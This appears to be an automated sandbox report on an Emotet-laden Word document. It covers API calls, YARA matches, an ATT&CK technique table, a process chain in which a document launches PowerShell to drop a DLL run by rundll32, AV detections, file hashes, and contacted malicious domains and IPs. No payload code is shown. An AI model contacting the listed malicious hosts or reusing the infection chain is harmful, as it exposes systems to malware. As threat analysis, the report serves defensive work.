                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,6_2_10013DE3
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,6_2_100109FC
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,6_2_10009A59
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,6_2_100112C2
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,6_2_10014F07
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_10013F22
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,6_2_1000C727
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_10011B52
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,6_2_1001175D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000E372 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_1000E372
                Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information:

                Yara detected Emotet
                Source: Yara matchFile source: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.922478242.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.689861945.0000000001070000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.689878857.0000000001091000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 8.2.rundll32.exe.f20000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.rundll32.exe.f40000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.rundll32.exe.1090000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.rundll32.exe.1070000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.rundll32.exe.1070000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.rundll32.exe.f20000.1.raw.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts | Windows Management Instrumentation 11 | Path Interception | Process Injection 112 | Disable or Modify Tools 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                Default Accounts | Scripting 12 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Deobfuscate/Decode Files or Information 21 | LSASS Memory | File and Directory Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel 22 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | Native API 2 | Logon Script (Windows) | Logon Script (Windows) | Scripting 12 | Security Account Manager | System Information Discovery 26 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | Exploitation for Client Execution 3 | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | Query Registry 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
                Cloud Accounts | Command and Scripting Interpreter 11 | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | Security Software Discovery 131 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 13 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                Replication Through Removable Media | PowerShell 4 | Rc.common | Rc.common | Masquerading 21 | Cached Domain Credentials | Virtualization/Sandbox Evasion 3 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 3 | DCSync | Process Discovery 3 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 112 | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Hidden Files and Directories 1 | /etc/passwd and /etc/shadow | Remote System Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Rundll32 1 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

                Behavior Graph

                [Behavior graph image not reproduced. Behavior Graph ID: 347028; Sample: v22Pc0qA.doc.doc; Startdate: 01/02/2021; Architecture: WINDOWS; Score: 100. Process chain shown: cmd.exe -> powershell.exe (drops C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll, PE32) -> rundll32.exe -> rundll32.exe -> rundll32.exe]


                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                Source | Detection | Scanner | Label
                v22Pc0qA.doc.doc | 73% | Virustotal |
                v22Pc0qA.doc.doc | 47% | Metadefender |
                v22Pc0qA.doc.doc | 86% | ReversingLabs | Script-Macro.Trojan.Valyria

                Dropped Files

                Source | Detection | Scanner | Label
                C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll | 100% | Joe Sandbox ML |
                C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll | 56% | Metadefender |
                C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll | 96% | ReversingLabs | Win32.Trojan.Emotet

                Unpacked PE Files

                Source | Detection | Scanner | Label
                6.2.rundll32.exe.1090000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                8.2.rundll32.exe.f40000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                Domains

                Source | Detection | Scanner | Label
                isatechnology.com | 7% | Virustotal |

                URLs


                Domains and IPs

                Contacted Domains

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                isatechnology.com | 35.208.182.43 | true | true | | unknown
                physio-svdh.ch | 194.209.195.106 | true | false | | unknown
                www.isatechnology.com | unknown | unknown | true | | unknown

                    URLs from Memory and Binaries

                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://messaging.office.com/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                            high
                                                                                                            https://physio-svdh.ch/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://physio-svdh.ch/wp-content/themes/econature/css/style.css?ver=1.0.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://physio-svdh.ch/comments/feed/powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                              high
                                                                                                              https://skyapi.live.net/Activity/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://physio-svdh.ch/wp-content/plugins/buttonizer-multifunctional-button/assets/frontend.min.js?vpowershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://api.cortana.aiDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://physio-svdh.ch/wp-content/themes/econature/css/ilightbox-skins/dark-skin.css?ver=2.2.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devicesDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                                high
                                                                                                                https://staging.cortana.aiDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://onedrive.live.com/embed?DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                                  high
                                                                                                                  https://augloop.office.comDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                                    high

                                                                                                                    Contacted IPs


                                                                                                                    Public

IP               Domain   Country        ASN    ASN Name                          Malicious
194.209.195.106  unknown  Switzerland    3303   SWISSCOMSwisscomSwitzerlandLtdCH  false
97.120.3.198     unknown  United States  209    CENTURYLINK-US-LEGACY-QWESTUS     true
35.208.182.43    unknown  United States  19527  GOOGLE-2US                        true
70.180.33.202    unknown  United States  22773  ASN-CXA-ALL-CCI-22773-RDCUS       true
50.116.111.59    unknown  United States  46606  UNIFIEDLAYER-AS-1US               true
173.249.20.233   unknown  Germany        51167  CONTABODE                         true

                                                                                                                    Private

                                                                                                                    IP
                                                                                                                    192.168.2.1

                                                                                                                    General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 347028
Start date: 01.02.2021
Start time: 23:24:14
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 49s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: v22Pc0qA.doc.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of analysed new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • HDC enabled
                                                                                                                    • GSI enabled (VBA)
                                                                                                                    • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winDOC@16/14@3/7
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 66.7%
                                                                                                                    HDC Information:
                                                                                                                    • Successful, ratio: 99.9% (good quality ratio 95%)
                                                                                                                    • Quality average: 79.8%
                                                                                                                    • Quality standard deviation: 27.5%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 77%
                                                                                                                    • Number of executed functions: 48
                                                                                                                    • Number of non-executed functions: 23
                                                                                                                    Cookbook Comments:
                                                                                                                    • Adjust boot time
                                                                                                                    • Enable AMSI
                                                                                                                    • Found application associated with file extension: .doc
                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                    • Found warning dialog
                                                                                                                    • Click Ok
                                                                                                                    • Attach to Office via COM
                                                                                                                    • Scroll down
                                                                                                                    • Close Viewer
                                                                                                                    Warnings:
                                                                                                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                                                                    • Excluded IPs from analysis (whitelisted): 104.42.151.234, 52.109.76.68, 52.109.12.24, 104.43.193.48, 51.104.139.180, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129, 8.248.141.254, 8.253.204.249, 8.241.122.254, 8.241.121.254, 8.241.122.126
                                                                                                                    • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 1320 because it is empty
                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                    Simulations

                                                                                                                    Behavior and APIs

Time      Type             Description
23:25:14  API Interceptor  44x Sleep call for process: powershell.exe modified
23:25:44  API Interceptor  10x Sleep call for process: svchost.exe modified

                                                                                                                    Joe Sandbox View / Context

                                                                                                                    IPs


Domains

Match: physio-svdh.ch
• v22Pc0qA.doc.doc (detection: malicious; context: 194.209.195.106)
• 2wUaqWdy.doc.doc (detection: malicious; context: 194.209.195.106)

ASN


JA3 Fingerprints


Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\DC97C0E2-E492-4CE8-9253-DB063F2B7EA0
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 132920
Entropy (8bit): 5.373078821495444
Encrypted: false
SSDEEP: 1536:CcQceNqaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:irQ9DQW+zBX8P
MD5: 389C1461181EDC4905029C5E88D35AA2
SHA1: 3E61E8C9A9739C2D53D7610C129047C5B332BBCC
SHA-256: C967124C561BD6E97DE925820D6CE8B20C64B913D1E343AEFB80FCD9EF96075A
SHA-512: 74903A87EF4AB07D39F4E4DBCA642CEC14DDC9CA199A8559B710A55B10D0A92F6775202CF46E419213FE3B690CF660A5ADE38A5C1550410A5695112633E6D551
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-02-01T22:25:05">.. Build: 16.0.13731.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{179EC3B7-37E0-4560-80F5-16F3BFE059F5}.tmp
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1024
                                                                                                                              Entropy (8bit):0.05390218305374581
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:ol3lYdn:4Wn
                                                                                                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                              Malicious:false
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{87200191-4D4F-4DCD-B181-904D5E386871}.tmp
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1536
                                                                                                                              Entropy (8bit):1.3643824618899223
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:Iiiiiiiiii8l+4V/Nc8++ldL61DX6tD6pV2E6qn:23dNG+PmBqZ6pV2pq
                                                                                                                              MD5:9731171E08A44D90DD005A586825086B
                                                                                                                              SHA1:FB904928494B5B3FEA79A40B4A6CA2F819790C25
                                                                                                                              SHA-256:7C33C462A36BAAB96EB896B42428B656C709D767B9C870ED47A2191B2A4B663C
                                                                                                                              SHA-512:4E689228FB0305952F5B8C4835B6F8D00F831B192AED6FD2F8EA0A7C3AD569A98428C2D74B3A7CD02A3B5F468FA0DF1B8DECA4F1F36BB6D8C44590CF4C5C74D5
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1196
                                                                                                                              Entropy (8bit):5.33361024576829
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:3aZPpQrLAo4KAxX5qRPD42HrCvKLoFe9tCKnKJF9iq:qZPerB4nqRL/HrCvjFe9tC4anv
                                                                                                                              MD5:3C95F06BAE25D8883754A9886A484998
                                                                                                                              SHA1:74684406A7FE82F6476D5D9C9AA63E075871A80E
                                                                                                                              SHA-256:9434B071A928518B9A14B79C07F4AD49F00E0E921C4FD868A4D8168E7ABFF938
                                                                                                                              SHA-512:32B51A03132B3CD0566A0B15A792C5E94729EB272238803B9E01A79487794FCB8B8EEE9F3284EDDE7AA4DE28F782DE6C5016E228DAD284E7F91F7D05AF6108DE
                                                                                                                              Malicious:false
                                                                                                                              C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):170164
                                                                                                                              Entropy (8bit):4.358394535375791
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:fr9jQo7LzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:fr5g8WpFpKKHHedydFeo+oQLUlPoK0
                                                                                                                              MD5:0CC8870D67DEEB05578F8107F79C3BC3
                                                                                                                              SHA1:90F1F216A983DA75584021C20243330727655EC6
                                                                                                                              SHA-256:997EDB52D239ECE12D62E6D41DD120AA74B013E8624498E352DC71F1B66E73B6
                                                                                                                              SHA-512:A8EEB1CA5B68D2A634726238AFFE761BF9C072629B3317E45B0CDA6D022E3B85F8157A4414F5857AE02585D4D6AB8953068E7F182B20D44FCDA14D03CF608A0A
                                                                                                                              Malicious:false
                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbmhr0zq.ixu.psm1
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:very short file (no magic)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1
                                                                                                                              Entropy (8bit):0.0
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:U:U
                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                              Malicious:false
                                                                                                                              Preview: 1
                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zyrecgys.4kk.ps1
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:very short file (no magic)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1
                                                                                                                              Entropy (8bit):0.0
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:U:U
                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                              Malicious:false
                                                                                                                              Preview: 1
                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):74
                                                                                                                              Entropy (8bit):4.060710299033871
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:M1blG+kLtCLs+kLtCmX1blG+kLtCv:MrG+kLtys+kLtzG+kLts
                                                                                                                              MD5:D9D81D211C7D3FE392C07C615275BBC8
                                                                                                                              SHA1:D0AFA7424E42C91595D6AF3178CEB8118A742FC4
                                                                                                                              SHA-256:8CA00953A5C409D8B6B2344A7DCD452A1A25A1F94E1034B2504919FFD123A8EB
                                                                                                                              SHA-512:FC4541A6A37F0D5AB6861417F2B68131D9C0C9708F3D413353EF11E71A721AE00E1F78BB0C78CAE1FB16DDCE2F39F86C75D780A9FDA863AF28301064F9B1A65C
                                                                                                                              Malicious:false
                                                                                                                              Preview: [doc]..v22Pc0qA.doc.LNK=0..v22Pc0qA.doc.LNK=0..[doc]..v22Pc0qA.doc.LNK=0..
                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\v22Pc0qA.doc.LNK
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:53 2020, mtime=Mon Feb 1 21:25:06 2021, atime=Mon Feb 1 21:25:03 2021, length=207253, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2130
                                                                                                                              Entropy (8bit):4.7012569507367346
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:8eEzitpCAKQWAkbbDG7aB6myeEzitpCAKQWAkbbDG7aB6m:8TzitpD9krB6pTzitpD9krB6
                                                                                                                              MD5:749427E569113450C7BA74A05F76CF1C
                                                                                                                              SHA1:1BB4517F99A24C9540CBEE35AB75E8AC818DE60C
                                                                                                                              SHA-256:17706A757CF169FFFAADE647211ADD561581721F26DFE0D62E427A82D6AEA4A6
                                                                                                                              SHA-512:944A79BE7B7306A7166F1626562528A43168C3CE9A649C61923ED0D9AC0C09B7952FFFEBA5F2C5F24740AF7A086BF0B65103C12AE635C72D514216662F537ED3
                                                                                                                              Malicious:false
                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):162
                                                                                                                              Entropy (8bit):2.537027933460949
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Rl/ZdHpljlqKVCd9lqKJBZpMDZl:RtZBplUOCdKSBZpMDZl
                                                                                                                              MD5:62D2E9D0E5A00A4933B40C773F2A3521
                                                                                                                              SHA1:D129090958A7122B098FD1CDE5A80D5FF74E9CF5
                                                                                                                              SHA-256:61314B84034510BCE3DEF89D73551BE6385E9FF831736409B9A0843325927252
                                                                                                                              SHA-512:563CF8AA385591CCEAE68A2E3E61D0CC7E4567A7D0C6B11BFAAEE690569C1A0194D7CF1CFA18B9FD8BBE4A61DB1BDD3C52AD0A913FC5498F42E2CE36BEEF2D78
                                                                                                                              Malicious:false
                                                                                                                              Preview: .pratesh................................................p.r.a.t.e.s.h..........@q.............H.......6C.......@}.............T.......6C.......@y.......lpc......
                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):22
                                                                                                                              Entropy (8bit):2.9808259362290785
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:QAlX0Gn:QKn
